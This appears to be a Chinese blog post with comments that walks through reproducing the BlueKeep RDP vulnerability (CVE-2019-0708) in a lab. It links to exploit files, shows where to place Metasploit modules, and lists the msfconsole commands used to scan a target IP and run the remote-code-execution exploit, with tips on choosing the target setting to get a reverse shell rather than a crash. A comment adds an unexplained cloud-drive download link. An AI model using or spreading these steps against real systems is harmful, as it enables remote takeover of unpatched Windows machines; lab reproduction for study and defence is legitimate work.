卑微的只能来复现漏洞,而且还是经历了emmmmmm的过程才复现出来。
镜像:https://pan.baidu.com/s/1FhZnLtIZbiOHh2mGAdTEDA 提取码:296r
Exp:链接:https://pan.baidu.com/s/13t0EoE6A5CDNOCmU17gFPw 提取码:jggk
一.安装好镜像,选择sp版本,开启远程连接,并允许任意版本远程桌面连接。
二.配置msf,将exp放到对应的msf文件夹下,同名的话直接覆盖。(4.的windows文件夹下没有rdp文件夹的话就新建一个)
1.rdp.rb -> /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rd
2.rdp_scanner.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
3.cve_2019_0708_bluekeep.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
4.cve_2019_0708_bluekeep_rce.rb -> /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
root@kali:~# msfconsole
msf5 > search 0708 //查看0708模块
msf5 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep //使用Auxiliary 模块扫描验证有没有这个漏洞
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 192.168.182.133 //添加攻击ip,然后run,发现有这个漏洞
//攻击部分
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //使用攻击模块
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
注意:
1.target是主机架构选择的意思,使用show targets可查看相关选项,这里必须要选择正确,否则会导致目标机器蓝屏。这里可以先试试2再试试3。(PS:这里我虽然用的是VMware可是选3会使得目标蓝屏,选2才能反弹shell,反弹shell比较慢至少要十几秒)。
2.我这里用的是windows7 sp1 版本。
打赏我,让我更有动力~
© 2016 - 2022 掌控者 All Rights Reserved.
holic
发表于 2019-9-27
我的最爱
评论列表
加载数据中...
skghost
发表于 2019-10-12
今晚,秋名山见。
链接:https://pan.baidu.com/s/1xPtg3leWbpMGEWpqgFUGpg
提取码:act3
复制这段内容后打开百度网盘手机App,操作更方便哦
评论列表
加载数据中...
ctf_leadsec
发表于 2019-10-23
1
评论列表
加载数据中...
ctf_leadsec
发表于 2019-10-27
1
评论列表
加载数据中...